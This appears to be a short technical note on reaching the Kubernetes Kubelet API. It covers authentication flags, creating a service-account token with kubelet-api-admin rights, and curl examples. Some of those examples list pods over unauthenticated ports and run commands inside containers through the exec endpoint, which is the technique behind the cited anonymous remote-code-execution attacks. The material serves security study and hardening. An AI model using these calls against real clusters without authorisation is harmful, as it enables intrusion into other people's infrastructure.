# Accessing Kubelet API * If `--anonymous-auth` is turned off, you will see a 401 Unauthorized response. * If `--anonymous-auth` is true and `--authorization-mode` is Webhook you'll see 403 Forbidden response with message Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy) * If `--anonymous-auth` is true and `--authorization-mode` is AlwaysAllow you'll see a list of pods. * `--port` int32 The port for the Kubelet to serve on. (default 10250) * `--read-only-port` int32 The read-only port for the Kubelet to serve on with no authentication/authorization (set to 0 to disable) (default 10255) # API endpoints * /pods - lists running pods * /exec - runs a command in a container and returns a link to view the output. * Other API endpoints not relevant to this post allow port forwarding, fetching logs and viewing metrics. # Authorization Token ```bash ## kubelet api kubectl create sa kubelet-api-test kubectl create clusterrolebinding kubelet-api-test --clusterrole=system:kubelet-api-admin --serviceaccount=default:kubelet-api-test SECRET=$(kubectl get secrets | grep kubelet-api-test | awk '{print $1}') TOKEN=$(kubectl describe secret ${SECRET} | grep -E '^token' | awk '{print $2}') echo ${TOKEN} ``` # Examples ```bash curl -Ssk --header "Authorization: Bearer ${TOKEN}" https://192.168.33.26:10250/metrics curl -Ssk https://localhost:10250/pods/ curl http://localhost:10255/pods curl http://localhost:10255/stats/summary curl http://localhost:10255/metrics # Running Commands in Containers curl -skv -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" "https://localhost:10250/exec////?command=touch&command=hello_world&input=1&output=1&tty=1" curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d 'tty=1' -d 'command=ls' -d 'command=/' curl -Gks https://worker:10250/exec/kube-system/tiller-797d1b1234-gb6qt/tiller -d 'input=1' -d 'output=1' -d 'tty=1' -d 'command=ls' -d 'command=/' ``` # 参考 * [Kubelet Anonymous RCE](https://github.com/serain/kubelet-anon-rce) * [Attacking Kubernetes through Kubelet](https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/)